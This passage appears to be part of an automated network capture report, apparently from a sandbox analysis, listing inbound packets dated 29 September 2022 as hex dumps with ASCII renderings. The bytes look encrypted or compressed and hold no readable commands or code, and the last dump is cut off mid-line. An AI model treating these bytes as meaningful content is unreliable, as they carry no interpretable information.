2022-09-29 12:50:29 UTC	1122	IN	Data Raw: 55 fd 69 fe bf 20 83 be 4c a5 aa a7 62 29 fc 69 41 a5 d2 b9 e4 d0 08 3c 2d 1a 3b 02 73 39 88 c1 ae e1 29 95 97 42 09 84 6f 0d 06 11 24 82 ac 12 d3 39 3e 18 59 95 1e 30 ab 33 95 c1 15 65 c2 33 1e 3f 67 69 4b b2 19 db 58 09 42 81 2d 49 2c b7 8d 04 4d 32 c0 81 5e 66 81 f2 5b 1b 1b d4 f4 ed 87 60 9c a2 1d b3 1b 76 9b 42 6b c3 33 e7 b2 77 89 18 37 9b 7e 91 33 44 f6 a3 59 10 ce 66 79 14 ed 58 fb aa 46 45 fb 97 61 ca d6 0b 95 8b 06 b1 d6 3e 21 33 3b 82 28 a4 c1 95 f7 72 97 29 22 bf ed 9e 2a 4a 48 c1 e4 96 54 4a 23 a1 bd f9 39 de a1 8c 0f e2 62 f5 d3 fa 30 9e ba 36 c5 ea 3a a6 b1 5b 6b b4 5e 5a 0e 56 77 e7 e6 40 4f 81 63 f0 7b bb 8e a3 83 49 fe b5 d9 4d 2b 23 71 96 3a 02 4a d4 bc b1 85 a5 be b4 48 ed df 14 d5 c3 09 a9 51 3d f0 0b c8 49 e2 a3 db 81 a0 8e 7f 7c 52 Data Ascii: Ui Lb)iA<-;s9)Bo$9>Y03e3?giKXB-I,M2^f[`vBk3w7~3DYfyXFEa>!3;(r)"*JHTJ#9b06:[k^ZVw@Oc{IM+#q:JHQ=I\|R
2022-09-29 12:50:29 UTC	1123	IN	Data Raw: ee 93 ef cd 2b 61 96 54 02 33 f2 11 0b 65 07 c6 fd f2 43 3b 33 e3 4d 54 09 ee 54 d8 03 0e 2e 8e 89 0d 31 73 1a dc c9 d7 ab 7e 8d 8b 13 50 bc fc 49 cd 0d fe 20 5d e9 53 6b 8a e6 03 0a 5e b8 7f 01 aa 40 28 20 88 ce 05 85 8d 7d e9 78 74 f3 c7 c1 44 b9 60 b1 f0 bf 45 49 e9 33 3c 9d ab 65 cf 1e 73 84 9a d1 27 4e 3a 43 bb 46 1b c0 28 8e bb c6 b9 eb e0 e9 23 9a 39 82 f1 f3 1c e1 85 c0 3a e5 97 2e c2 69 af a2 b7 d2 05 09 7b 19 f3 29 46 5c d8 39 58 33 dc f4 dc ca 26 4f 88 93 fc fd 45 2c 01 10 ee a8 ae e6 5a c3 fc 06 19 96 38 0c 48 d1 b6 81 d4 81 0d e0 2b b5 53 98 55 5a e1 5a d9 87 af fb f8 51 98 3a 23 e1 75 70 91 a5 e8 62 27 97 d9 a9 2a 2b 75 62 50 80 4f 03 e7 f7 cf 53 d7 cf 7c f0 50 29 15 f1 44 c3 77 70 9d de af be 5e 2e 42 26 91 26 d6 60 fc 66 1b 3c b3 f7 e7 b1 Data Ascii: +aT3eC;3MTT.1s~PI ]Sk^@( }xtD`EI3<es'N:CF(#9:.i{)F\9X3&OE,Z8H+SUZZQ:#upb'*+ubPOS\|P)Dwp^.B&&`f<
2022-09-29 12:50:29 UTC	1125	IN	Data Raw: 30 43 ab 6d ae 09 49 eb 61 71 a1 a4 db 5c af 23 ac d2 7b 6e 50 17 e0 14 8c 35 84 d3 d3 14 cb 0e e3 96 e2 36 fa cf fe 0f 9b e2 e9 30 2f 36 5b 8f f4 26 71 41 b5 00 4f 1c 0d 49 2d a9 b6 10 b0 33 45 22 49 7a 12 27 c1 b2 a9 c8 4c 6c a3 8f 55 49 65 f4 db a4 bb e4 06 d1 5c 20 76 ac 8d 47 d4 61 26 c8 49 98 2f 90 e1 e2 1d 93 30 6f 88 3d 1e 29 73 81 c1 e4 51 1f 73 fa 24 c6 9d e8 be 1b 3a df 04 ce 8d b4 95 d7 5d e4 75 6d 48 b3 23 ad 8f 2a 5e f9 93 d3 4e dd 03 5c 4f 12 fd 3f 44 bf 79 0d 27 50 a0 31 a0 ee bd 5f e0 e8 4b 5d 12 1a a1 f1 88 73 92 89 a3 20 96 5b 9c cb c2 9c 9b ca 04 6a a5 d4 fd a1 58 42 92 95 b1 dd ca d2 bf 54 ad ec 95 8c 89 28 0f 97 78 87 1d c4 c2 d0 48 12 21 7a 38 94 b3 88 7a ec 75 a9 d2 84 be f7 45 74 e3 4b 85 f1 a5 50 4c 9e c5 4c 0b 10 34 2a df 04 76 Data Ascii: 0CmIaq\#{nP560/6[&qAOI-3E"Iz'LlUIe\ vGa&I/0o=)sQs$:]umH#^N\O?Dy'P1_K]s [jXBT(xH!z8zuEtKPLL4v
2022-09-29 12:50:29 UTC	1126	IN	Data Raw: 83 73 b0 d0 97 e9 d5 91 20 a8 75 5f 89 ca c0 3c cb cf ab 92 02 48 cc 93 79 f7 7f ef 9d 0d 51 27 36 c9 1e f2 fb 33 34 45 da 34 ee df 72 6f 9d 6c 81 f8 0b 6a 90 64 b0 11 9d 8d a8 e4 5e f2 06 b8 e0 99 d8 ae 1c 53 3b 02 f4 9f 25 08 e5 2e fa 21 f7 55 ca 85 2d db 15 7e f6 63 79 45 25 73 55 34 60 f0 7d b7 be cc 99 24 b2 44 43 4e 7e d8 5a ea f2 07 f0 3f 89 fd e5 41 79 3c 2f 45 96 11 d5 a8 30 2f 48 16 65 e7 f5 0c 2f 27 a2 22 c3 bf 40 1e 20 82 ae d4 d7 26 c5 8e 0f 3e e8 08 d6 96 5a 53 ec 6a 12 25 ba 09 a0 f6 59 40 d6 23 85 b8 67 54 c8 2b 72 32 bc 3f d1 45 16 f8 58 bd 17 45 f7 db df c2 44 3d 9c bd 6d 39 d0 87 29 e5 42 f4 46 09 91 94 91 e2 49 92 1b 80 a2 69 b0 ca 5d d2 3c c6 e3 e0 9e bf 99 e7 4b 70 87 3f 1b a5 bd 8b 2d 51 e6 3c c1 95 e5 0e 7e 71 d7 20 64 4d c6 f9 e8 Data Ascii: s u_<HyQ'634E4roljd^S;%.!U-~cyE%sU4`}$DCN~Z?Ay</E0/He/'"@ &>ZSj%Y@#gT+r2?EXED=m9)BFIi]<Kp?-Q<~q dM
2022-09-29 12:50:29 UTC	1127	IN	Data Raw: db 99 4f 7c b3 82 0a 49 3b b5 da ea 1c a7 f8 15 b3 46 4d 0d 18 0f 55 02 6e d7 57 f2 b8 ff 2e 63 8d 8d ee 59 32 6c fb a4 85 2a 97 e3 54 d7 1f f9 42 0b a3 26 a5 1d 2f b5 b1 90 2e c5 64 61 41 21 04 06 dd c3 6a 07 2e 44 4c 33 89 06 db 94 ba 19 d2 af 6b f5 5a c6 b3 4c 7b e1 46 66 92 45 8a fb cc e6 32 5e f3 88 3b 93 cf 42 a0 bd b2 2d 38 4b 16 3f 05 ff 17 89 25 57 d1 0f 85 92 c8 cf 67 02 ce 83 ab 62 17 7e 00 24 15 4e 7a 45 6b 50 d1 e6 72 01 f0 68 00 14 fb 10 8b 26 d8 d5 5d 2f 7b 2c aa 54 c3 a7 6e cf 57 82 46 9e 44 c8 a6 52 31 0d f6 51 e4 25 1b fc 26 4c ed 91 fe 93 c3 ab d8 fd 87 48 ee a6 e6 fa c1 40 bd c6 a3 5f b9 c3 44 84 99 31 79 3a 50 fe ef 2c 8a 39 e3 be 00 63 02 08 41 07 b0 0f 3f 6b 00 12 07 55 4b 18 c1 46 ad 37 9a aa 72 b9 0f cc a2 6d 7f f7 ae 5b cd 1f 7a Data Ascii: O\|I;FMUnW.cY2l*TB&/.daA!j.DL3kZL{FfE2^;B-8K?%Wgb~$NzEkPrh&]/{,TnWFDR1Q%&LH@_D1y:P,9cA?kUKF7rm[z
2022-09-29 12:50:29 UTC	1129	IN	Data Raw: 2a 3d 20 1c b5 5d cf 26 11 d1 0d 35 1b 93 f3 6e c9 7c 21 ef 65 8b 5e b4 8e e3 af 0c 71 1e f9 75 e7 57 43 f5 c6 6c 79 16 e1 0c b8 7f 3c 93 34 a1 55 be 19 26 2c 21 d9 27 62 7e 87 18 c2 a2 c9 cb 02 9a ab 99 9c b8 ed 23 ef d4 93 0a fd 7f 85 37 4c 4c 3b 8a 1e 48 5b d6 3b 07 a9 fa 21 b6 ff 59 d1 f9 86 2f e3 e7 d5 3b 03 ed 5b ea 21 59 8d f8 c7 ed e3 f5 7e a8 4a 22 b1 e9 5a 52 fb b0 15 f2 49 92 ee 3e 3a 39 59 33 54 80 d1 74 4d 86 e0 d3 13 5e a9 bd 68 93 5f 8f 91 65 5e 69 bd 4e eb 14 b8 37 0d ca 26 02 cf 88 31 cb 07 a8 54 69 b2 5b 4f 9a a0 fd f5 75 a2 fa cb e8 1b b6 11 8c 15 ca 02 7d 9c 3d 6f 99 7d d5 41 61 d7 a6 76 09 08 da 83 05 64 34 a9 b2 4f d7 e4 8f e7 df 99 2e b6 61 cb 63 a3 0f d3 88 d5 44 ef 29 15 49 44 de c3 68 4d db db 5f bd 70 a1 63 d7 f8 b7 57 f8 86 f7 Data Ascii: *= ]&5n\|!e^quWCly<4U&,!'b~#7LL;H[;!Y/;[!Y~J"ZRI>:9Y3TtM^h_e^iN7&1Ti[Ou}=o}Aavd4O.acD)IDhM_pcW
2022-09-29 12:50:29 UTC	1130	IN	Data Raw: db a5 a1 d2 dc ed 13 11 30 ca 6e f3 e0 6e 3a 16 87 a6 7b 8d d4 bc 3d f7 e6 d5 0f fa e8 0f dd 1e 82 da 76 42 98 c5 99 ed 46 87 3d ec c2 7a a0 d7 ed f8 35 a7 3c de 27 f6 54 fa 5f 55 c1 28 62 c0 c0 e8 a6 f4 05 5d 4f e1 0e ba 5b af 05 fe f2 ef c2 be 8f 42 76 9f 9b fd b2 32 cc 0f 7e 83 3a 60 c8 7b f6 b2 00 70 05 1b c4 cc b2 4b e9 13 64 c2 62 0d da f1 1b 85 ad 5f bc 77 94 ca bf 51 da e7 0e 69 ae 4c 73 e1 65 98 be 6a 11 b2 ab 1e e7 d8 29 8b 43 8f 94 e8 08 63 91 a2 96 37 62 b9 ab e1 e7 82 59 2d ed d6 90 f3 a9 39 36 ae e7 53 08 f2 23 1b 12 f1 a8 b3 1c 2d 5f 2e ab 05 9e fc ce 70 10 8f c0 c2 95 aa c8 76 0f d2 08 31 29 93 ee 4e fb 4f a2 12 e8 3d b3 82 ed 71 55 93 3f 0e 26 18 d1 69 5d 7a 30 ee a0 8f 07 9d 9e d3 9e 44 3f c2 49 88 87 58 f8 4e 7a fc 3c 02 25 4e 4c 40 63 Data Ascii: 0nn:{=vBF=z5<'T_U(b]O[Bv2~:`{pKdb_wQiLsej)Cc7bY-96S#-_.pv1)NO=qU?&i]z0D?IXNz<%NL@c
2022-09-29 12:50:29 UTC	1131	IN	Data Raw: c2 fd 4b ab b8 f6 1e b3 d2 d6 2a 5c 2e 3e 2c 8a 31 59 2a 4d 1a 11 3b cf 84 48 02 6c 98 09 92 ed e6 1c 1b b5 52 98 89 4b 9e 59 e3 7f ac d7 44 18 70 7c db 52 c8 85 f7 d4 85 21 e7 55 ed 88 17 5c 7d 29 20 86 fc 64 da 87 d9 0c 92 93 2c ee 5f 60 8a 8c f6 72 bf de 22 26 fc f2 e7 4c e3 cb 46 15 3d ae f0 e7 78 3d 5e c0 2e d8 9c 40 54 c7 47 b9 c3 a2 f8 79 d1 98 98 ad b7 e4 b0 b8 28 b2 fe d3 97 f5 db c3 bd 64 b0 f2 d6 95 13 4a 4f 7c 17 ea 8c 3f 55 ff af 14 f0 46 b4 80 de 6e bb d4 3c 08 f5 4a 15 b8 ca 56 17 f5 c7 6a e0 0c 76 5d 1d 4a b4 0c 71 0f 10 2d db 8b d3 bf 36 b4 ef ac 29 cf 3f 45 69 89 30 e5 18 72 d5 8b e5 83 be fc 73 3b e3 15 45 e7 7b 18 8a 65 31 ed b6 53 5a cd c5 3b cd 41 73 99 2d 3d 7f 12 45 2f df 4c 24 d8 4f c8 30 d2 d1 67 27 2a 73 71 33 44 55 99 e2 ae be Data Ascii: K\.>,1YM;HlRKYDp\|R!U\}) d,_`r"&LF=x=^.@TGy(dJO\|?UFn<JVjv]Jq-6)?Ei0rs;E{e1SZ;As-=E/L$O0g'*sq3DU
2022-09-29 12:50:29 UTC	1133	IN	Data Raw: 24 92 fe fc 77 e2 29 9c a9 12 46 cd 25 85 c0 aa 9f be dc b3 0c 6d 8e 0d 41 6a 3d 0d 28 a2 fa e4 db 06 3f 63 2b fb ce 1b e5 5d 42 cf 4b 1f f4 85 8a a5 d5 2b 04 fe 2a 55 fc 0e f9 dd 5e 8c e5 e1 d2 fc 7b c5 6a 0b bd 88 04 5c 08 1d ef f4 b5 33 8e 07 4a e9 80 01 0b 42 74 19 2b f3 b0 43 07 a4 d0 a4 99 d6 f8 b9 45 26 6a 6c bd f9 00 89 47 52 53 cc 8e 56 79 5c f0 cf 82 41 c0 6d 17 a0 ff 67 2c 2a 4a 37 b6 e2 31 17 af ae c9 e0 60 4d e5 7f 7b 83 49 66 5c 07 3c 68 f2 c6 83 0f 78 99 0e 39 b7 ef a0 08 6a 10 db 96 43 e6 f5 26 2d b1 f9 9f b0 94 ef 3b d2 05 dc 6b e5 e4 12 82 eb a3 80 2b 50 db 9b 9e 24 32 9f 21 b8 0f b8 cb 2b 2b 9c 2c f0 0c f7 47 c7 39 a9 cb b9 e6 a0 2c 34 03 f9 fe 1e 38 ca ff 27 2f 9c 35 62 74 1c 38 50 39 7e d4 bd f7 19 a9 34 5b d1 9b 93 52 c8 cd ff 16 b2 Data Ascii: $w)F%mAj=(?c+]BK+U^{j\3JBt+CE&jlGRSVy\Amg,J71`M{If\<hx9jC&-;k+P$2!++,G9,48'/5bt8P9~4[R
2022-09-29 12:50:29 UTC	1134	IN	Data Raw: 25 88 e4 fb 23 04 4f 1e 93 c9 60 78 0c d6 76 57 92 e6 c1 4f d2 0a 57 c2 17 8e 75 c6 4d e4 23 b3 95 3c f7 b5 07 67 78 75 de 8e b5 3f 98 85 d0 57 6f 4b 80 46 8e 1a 54 60 c8 eb 75 1e e0 8f 99 bb 52 7e 47 9d 88 e4 c5 9d 82 d7 9b 1e 5f 48 32 75 de c9 97 c1 f4 75 5a 80 97 21 67 72 b7 f7 1f 5e fa 9e a4 d7 e2 7f ff 07 cf e9 e6 e2 43 2e f4 10 45 fd f4 ab a0 88 d2 10 8a 49 c3 25 66 f0 82 b7 bd ee 8b 4f 19 f8 1f 46 e2 0b b6 db d0 16 0d 99 cf 35 44 f6 c5 8a 01 44 d1 20 6d 7e 0e 5f 0a ec 1b f0 85 a8 2b 78 36 03 77 54 ed 64 93 f1 af 88 99 c1 fd 26 fc 5f 41 e6 2e 2e 93 ba 43 5e b8 cc 53 85 26 26 79 f7 69 79 fb 24 32 fd 0e 67 8b 65 88 d7 f2 58 dc fa 80 07 84 01 a9 f0 33 e2 10 ba 3f b1 e2 02 d9 8f b5 bf bf 0e 69 3a ef 50 09 af 73 3d 27 b0 3d ff 83 60 f9 5e b0 ad 8f 91 73 Data Ascii: %#O`xvWOWuM#<gxu?WoKFT`uR~G_H2uuZ!gr^C.EI%fOF5DD m~_+x6wTd&_A..C^S&&yiy$2geX3?i:Ps='=`^s
2022-09-29 12:50:29 UTC	1135	IN	Data Raw: 9a 66 0e fd 8f 95 94 b2 46 bc 84 2f df 4e d4 2e d2 7d 0a da a0 12 54 ea 5e 03 30 b8 2a 13 c0 ab 3f 39 ce c2 d7 37 cd d0 66 33 b2 b0 97 57 4b c7 9e f5 06 f9 4b 09 0f 5c d5 c3 97 ee e6 eb 4f 94 ce a0 0f 54 0e 91 8a 5b e7 51 4a 55 c8 94 db e2 83 33 3d b0 01 9d 2c be 0c 02 f1 2b 71 f6 d3 fc 2c ea 51 dc 7c 88 c2 49 c8 05 12 73 e6 11 9e b2 f9 85 6d f2 fb d1 c4 37 a9 4e ea b4 24 e8 38 42 fe d8 bf fc fc 54 95 e7 e1 fd 3a 8f 40 72 93 53 e1 e0 1b 2b 7d da 89 8b 19 a2 e0 b8 13 a1 e0 b5 5d 1d 77 73 40 14 af 8c 8a 27 04 74 00 ad 8c 97 4e 7f 34 5c 88 56 12 9a c8 f5 e8 51 72 04 3a 0e 03 eb f8 f3 8c e5 6d b5 23 93 82 69 cd 4a 88 d8 06 51 cc a9 a2 b1 3a 74 0c a7 fe 36 a6 bf cc 8e f4 ff 7f a6 db 72 7c ca bd e2 ab 73 60 ad a7 12 25 ea bf a4 d7 2d 58 5f 4a 7b a6 4c 5f c5 1d Data Ascii: fF/N.}T^0*?97f3WKK\OT[QJU3=,+q,Q\|Ism7N$8BT:@rS+}]ws@'tN4\VQr:m#iJQ:t6r\|s`%-X_J{L_
2022-09-29 12:50:29 UTC	1137	IN	Data Raw: 12 6c e3 a3 b4 64 5d 9a 89 31 de 52 d2 e6 70 e6 c2 a0 10 ad 9b b4 55 1c 0b 42 af 85 02 a6 2b 0e 31 6f 15 d1 2f 99 71 d4 16 40 b9 34 20 31 20 3f 1f 54 7c 61 7e 7a 6a 21 d5 ac 8f c7 37 f3 e0 04 ab e6 f6 db cc ab 70 79 cb 0e 2d e8 c2 73 10 68 ae 88 87 ec 85 eb 7b 91 82 06 56 aa 36 2d d2 72 6e 87 08 c8 a8 bb d1 46 56 89 97 a2 7d ad 0d 24 11 2d 0c 05 ca 17 6d c0 a3 06 64 52 7c 93 52 ff d4 40 77 4f 00 40 ee da b6 d1 48 70 f2 c1 86 4a df e6 d2 0c 51 22 f1 b1 ca ce a8 a5 9a 1c a2 04 c9 0c ea 98 9a e1 01 de ca 21 3c 88 bb 4d e4 51 b2 fe 0a 11 7c e0 48 41 15 d0 f6 c3 8d b8 24 27 86 8d 40 aa d1 28 54 19 e7 26 da 7f a3 65 57 00 1f 3b c6 67 c6 d3 20 9a 7a 93 32 e7 1a 69 a9 5a df 40 72 63 d5 ad 4d 5d 94 f4 53 e4 32 3c b6 97 56 8d 7c da 76 32 dc 47 76 ab ef f7 17 f9 4e Data Ascii: ld]1RpUB+1o/q@4 1 ?T\|a~zj!7py-sh{V6-rnFV}$-mdR\|R@wO@HpJQ"!<MQ\|HA$'@(T&eW;g z2iZ@rcM]S2<V\|v2GvN
2022-09-29 12:50:29 UTC	1138	IN	Data Raw: 67 07 2e e4 72 1c 2e f7 44 d7 94 19 62 36 3b c3 7e 23 ce 89 35 8a 82 10 11 c8 92 e0 27 8b d4 b4 7b 95 15 84 3b 65 d1 63 fd 82 c2 77 b1 c7 0f 22 7a 8a 0f 65 e6 4a 94 2c 29 4b 73 9f de 17 0b 55 c4 02 bb 6d 4a 00 be ec e6 b3 7c c1 68 f2 03 56 c9 bb 2f 40 df 26 c3 8b 2c ca 4f 7d 8c 06 4e bc dd 7a 3a c0 b5 81 ff 43 76 7a 41 f0 32 ff 83 e0 af 9c ab ae 4d 47 0e 12 a7 b1 31 e2 f2 2c 99 95 15 af 81 3d 23 bd 1e 38 7a 40 44 70 10 80 ad 7a 4d 34 79 29 12 75 0c f0 4a ed 00 32 8a fc 84 fb 30 43 7d da e5 0d 19 d1 26 75 9a 32 7d 62 b3 f4 a0 ed f6 34 fc 82 27 7e 30 3a 3f 3b 0d 20 99 2e 85 b8 a4 4b 6d 18 64 3b 11 fc 22 1e 17 ab 7b 8b f2 62 af ba 20 f4 53 d6 a3 c5 1a e4 47 da d4 0c 23 f3 a7 60 d6 ae 06 26 dd 5f 06 bd e4 93 47 ad 73 fe 1e 94 0c 56 9c 30 4a 93 02 b0 c0 e3 22 Data Ascii: g.r.Db6;~#5'{;ecw"zeJ,)KsUmJ\|hV/@&,O}Nz:CvzA2MG1,=#8z@DpzM4y)uJ20C}&u2}b4'~0:?; .Kmd;"{b SG#`&_GsV0J"
2022-09-29 12:50:29 UTC	1139	IN	Data Raw: 35 f5 8e 24 0c 44 c7 62 96 b4 1c 9e de 54 4a 32 fd 6f 5d 5d 16 35 27 5a 12 2e 5d a8 6b ad af d0 d1 b9 cc c9 12 09 2e ee b2 94 3d 0c 7d 89 38 a8 56 ca 35 8f 05 de 09 44 66 a2 fc 9f 34 be f5 de 18 fd 8c db 46 06 2a ef 5d 76 6a f8 22 8c 08 0e 68 17 5f 67 11 da 5c 13 16 71 89 b1 a2 ac ef bc 4a 61 9f 74 c7 5f 40 12 8f 5c 8c 76 c4 8f f2 c8 ee fe b1 00 f1 f1 2a 1d c5 31 2f 5e 63 ab 43 73 c0 b7 5c e2 3d 03 9e dc 80 f9 7b ad ec e1 e7 84 9d 65 ff e4 85 2c 59 8d 2b 15 50 46 11 74 27 f0 7a b5 51 73 51 d0 7f 86 7f 3c 7c a7 bd ea af bf 73 31 53 07 e2 4e c9 19 69 52 33 80 1c 58 5f a2 9b 8a 7e 6f 5e dc 68 e6 5a 46 c8 d8 0a 8d 5b c4 95 53 ba 44 af 23 ec 4a 8b 82 d8 a2 29 cc aa 84 94 bd b9 97 29 0d f0 96 25 47 35 da 24 4c f4 9e 1a 24 14 9f 6e f7 35 15 0a d2 09 00 21 39 aa Data Ascii: 5$DbTJ2o]]5'Z.]k.=}8V5Df4F]vj"h_g\qJat_@\v1/^cCs\={e,Y+PFt'zQsQ<\|s1SNiR3X_~o^hZF[SD#J))%G5$L$n5!9
2022-09-29 12:50:29 UTC	1141	IN	Data Raw: fc d0 c7 e3 c0 a9 87 b5 19 b7 18 b8 19 75 4f b9 f3 31 01 54 03 66 c6 d3 c9 aa 58 14 fb 32 67 4c 72 34 dc 6a 52 31 73 30 6a a9 b3 5a 23 90 b7 7e 34 9d 1e dd a2 67 57 d5 46 4a 16 64 e0 58 76 e9 29 8b 09 f3 b1 a6 66 5d 0c b8 30 1c 92 6e 12 b4 62 7b 5e 48 30 fc e5 00 ee 57 a3 f5 9e 2f 85 0b 3e f8 d9 02 4e ce 8b 5a e4 12 48 13 12 9a c1 c1 cd 97 25 3f 1b 05 d1 00 79 5a ee c7 e1 93 a4 13 bf 00 2a 63 aa aa 6c 96 e0 e1 c0 4c df f8 70 94 de 0b ab 24 05 2a 28 5b 7d 8a 5b 88 1d 07 69 0f f6 83 bc bf 4b 64 f9 dd 41 fa d7 30 27 d1 b6 a4 ea aa 97 ff 15 29 81 e4 05 18 d0 d0 13 a5 c6 80 5e 27 ca dd f3 c9 17 ed f1 83 9d 2b 50 b5 33 6c 67 07 2a 5f 34 8f fa 97 43 fc ad 14 3c 3e f7 26 40 bb 02 24 bf e9 37 87 63 b6 2c da 76 d0 a8 2a 8b 69 00 b2 96 c2 51 1a 63 35 78 2b 76 d8 97 Data Ascii: uO1TfX2gLr4jR1s0jZ#~4gWFJdXv)f]0nb{^H0W/>NZH%?yZclLp$([}[iKdA0')^'+P3lg_4C<>&@$7c,viQc5x+v
2022-09-29 12:50:29 UTC	1142	IN	Data Raw: d1 05 3a 8c 59 a6 b0 c3 09 8a 36 7e 25 46 14 07 53 76 e2 44 ef 79 47 7c 0b da 8f bb 07 67 47 f2 e7 66 32 a3 c4 e8 10 1a 7a da e6 80 9c dd 44 f4 35 63 d7 64 a0 43 69 c9 e0 91 21 b5 96 ab 95 e0 da d8 a8 a5 a3 75 fa 72 5b 97 6c 1c 23 48 d2 a9 25 5a e2 84 e3 5c 13 81 f2 4e 19 d7 91 c0 58 ba a6 31 ba 4f b7 1e 72 ab b0 ff d7 91 be 24 dc 27 a5 e1 00 4d bd 59 97 8f f6 85 c0 0b 02 61 79 0e 23 a3 73 10 fd 22 92 a8 f6 f5 3d d1 7c e7 8c a5 a4 f4 b7 76 18 ec 64 84 e4 85 61 01 3f 7c e6 4b c5 5b e7 dc 96 1a 76 db 32 0d 7a 1b de 0d 2d a9 c9 ba d0 1a 5a 35 db 4e f0 06 56 3a ca d4 a5 58 0e 66 71 4c de 86 d8 2a 1c d5 a4 99 6c 0c 03 03 f6 b8 44 11 02 46 c5 95 6f fd 64 f7 b4 32 3c 4e f5 b5 a3 d2 4b 7e 6a a6 93 ab 2d d6 8e 4f 14 81 d5 29 2c da 79 ac 30 7a 4e 19 6d c4 9d 9c de Data Ascii: :Y6~%FSvDyG\|gGf2zD5cdCi!ur[l#H%Z\NX1Or$'MYay#s"=\|vda?\|K[v2z-Z5NV:XfqL*lDFod2<NK~j-O),y0zNm
2022-09-29 12:50:29 UTC	1143	IN	Data Raw: 9d e9 26 66 0b c0 be a2 8a f2 b5 49 97 8b 71 fe 8c 57 af 97 c6 37 17 62 a2 47 11 ba c7 55 ef ba 63 b6 74 06 4f 4d 35 99 81 02 8a 76 18 a0 32 4a 64 53 d3 bf 05 55 ca 03 ac fc 77 e4 4f 90 d3 e0 c5 c1 75 e5 33 6f 92 85 38 36 00 fd ea 92 e9 d9 da 56 e0 6d 2e ec c6 ed 92 62 f1 45 40 ef 69 14 2c 83 49 05 bc f0 45 5c 70 2d 2a e2 38 82 3e 86 c3 d7 62 25 f6 46 f5 6e 71 4c 47 25 ec 0b 80 d5 96 c2 7d 0f 2d c7 00 55 c1 d7 56 de cd 35 4b b5 9b 06 87 4b 03 85 d2 13 f5 46 8f da 9e 76 88 a4 29 40 97 b0 15 99 b5 22 d4 a1 af ee 8b d5 78 96 e1 10 a8 18 1e e4 8f 2c d5 85 13 57 f1 e6 d2 a8 29 63 56 03 ea 12 23 4e e1 18 15 77 ba 2c 36 5f 67 d5 6f 58 7d 86 23 b4 22 32 0e 05 ee 2e c5 37 ef 5c c0 12 d5 9b d0 a9 d1 64 61 69 ad 91 37 73 fa 16 37 b1 60 4b 84 e5 ef 64 25 a6 ab 8b fb Data Ascii: &fIqW7bGUctOM5v2JdSUwOu3o86Vm.bE@i,IE\p-*8>b%FnqLG%}-UV5KKFv)@"x,W)cV#Nw,6_goX}#"2.7\dai7s7`Kd%
2022-09-29 12:50:29 UTC	1145	IN	Data Raw: b7 59 6a c0 79 dc 53 40 76 b2 72 ae bc 89 15 cd 23 2c 1e 0d 7f aa 04 e6 fb 87 d0 50 72 0c 4b 41 ab c0 ba 75 54 dd d8 77 0a 60 7c b3 8b 45 a5 14 03 9e 92 e5 a4 97 a2 cc 83 d0 f8 e8 49 25 64 1b 0e 54 e0 48 9b 4e 02 f1 51 37 be 63 03 a3 96 e3 59 5d 35 a9 7e d8 96 e2 d2 22 d3 49 02 62 20 2c af 4f 2f dc 12 ba ec ae 0a d4 a4 5a 39 62 bc 0a 0b 0c 78 f4 3d 3a 96 d1 cd 1d da fe 87 6f f3 d5 cc 5f fd a8 c5 cf ea e6 02 c6 4b 92 83 b7 d3 28 27 6f cf 20 b8 8b 16 55 88 a8 ed da e0 c7 49 ef 13 df 90 0a eb 22 2a 57 a0 05 21 02 85 00 5a c6 ee 23 51 88 b0 41 b1 0d e8 7a 5d e7 98 20 eb 8a e5 2a 09 55 c0 7c 28 f6 59 d8 fc 3d fe d1 8a 52 99 5d 19 ae 08 ba df ee c4 8a 9d 8f e0 6d 75 ed 0b 3c 63 a3 f3 de ae 2a 81 1d 39 f7 5b 50 44 73 f6 d9 08 61 80 03 af 89 a6 01 cc f2 ae 55 f6 Data Ascii: YjyS@vr#,PrKAuTw`\|EI%dTHNQ7cY]5~"Ib ,O/Z9bx=:o_K('o UI"W!Z#QAz] U\|(Y=R]mu<c*9[PDsaU
2022-09-29 12:50:29 UTC	1146	IN	Data Raw: 59 68 ed 48 0b 4b 60 bb d2 44 31 04 9a 18 60 1e 68 b7 97 2a 8c 3f 6c b4 11 c6 3c 2c 4c 70 f1 40 ee 0b a5 b0 03 07 e5 09 49 a9 3d 28 3c 73 d4 67 17 cd b3 97 4b 8d c5 c0 be e1 a6 79 12 12 df 9e 8f 9e b5 fa e4 68 68 41 20 e3 c4 f5 a8 4d ec 28 93 3c 10 78 48 be 06 01 00 3c 14 af eb 98 8e 24 79 a5 7d 04 4e 2f f5 4e ff a4 b7 6b 64 78 86 9e 66 8e b6 86 58 fd 3c 50 61 70 9a e0 02 78 96 63 98 5d fc c4 23 53 fd 80 4b 2d 7a a0 73 4a 75 e1 b1 4b f3 cd b0 f7 11 8d 33 0d b6 6a 30 d7 26 fd 5c fb a7 e2 cc 34 ea 91 de c8 3f a0 76 ec d7 32 83 0a 95 2d 53 01 e4 8d c9 2c 43 8f 0f 00 0a 80 90 fc 32 4f f6 77 53 dd 44 96 3a 6f f5 01 66 12 1c 3b a7 eb b7 3c e5 3e eb 4b 8f 91 4a ca dc 35 0e 21 af e2 df 2e 39 3e f6 f0 3f ec 43 c0 7d e9 06 bb 66 fe 5e 8f 9c c1 a9 41 d6 31 ff cb 2a Data Ascii: YhHK`D1`h?l<,Lp@I=(<sgKyhhA M(<xH<$y}N/NkdxfX<Papxc]#SK-zsJuK3j0&\4?v2-S,C2OwSD:of;<>KJ5!.9>?C}f^A1
2022-09-29 12:50:29 UTC	1148	IN	Data Raw: 60 6a d3 38 e0 a9 a6 98 c6 d4 8f c5 71 2d 02 b2 f1 d3 8f 27 61 5d 43 6e a0 79 00 f8 09 58 78 93 a2 c1 8d 3c 38 fd 65 92 00 4d 1b c2 59 b0 a2 7a c2 5e 5d a7 99 17 ea 2c d9 c4 d2 fd ed 33 5a 14 a2 4e 45 2b 7c 97 c7 fc e7 6c c9 c8 59 b5 8f dd f2 c5 30 f8 35 1f 6e f5 08 c1 7a fd c4 29 3f b9 3a 43 fa ef c0 d7 39 0c 5f fa 22 61 cb 49 f1 06 a9 fc 40 47 46 13 62 5a 55 79 43 e2 80 db 9a c6 d0 cc 66 5c 23 bb 21 b4 44 9f 11 43 80 8a 90 9d c5 55 0b a8 d2 eb 35 20 e8 72 dc ac 16 5e 6b f4 53 0a 89 49 7c 18 86 58 73 52 06 5d e5 2f bd 0f 90 29 9c b5 19 cf 1b 1e 03 ec 8d 13 ea cb c2 4d 87 dd 18 22 06 52 de 7e a9 24 96 71 67 54 ee a6 35 05 bc 8a 01 cd 35 a0 a1 c9 fb e1 e6 c1 61 ea cb ac 99 a5 1a 61 0b 2f 93 ec 0e 2e b1 f6 5a 25 7f 16 ec ce 65 20 97 37 c0 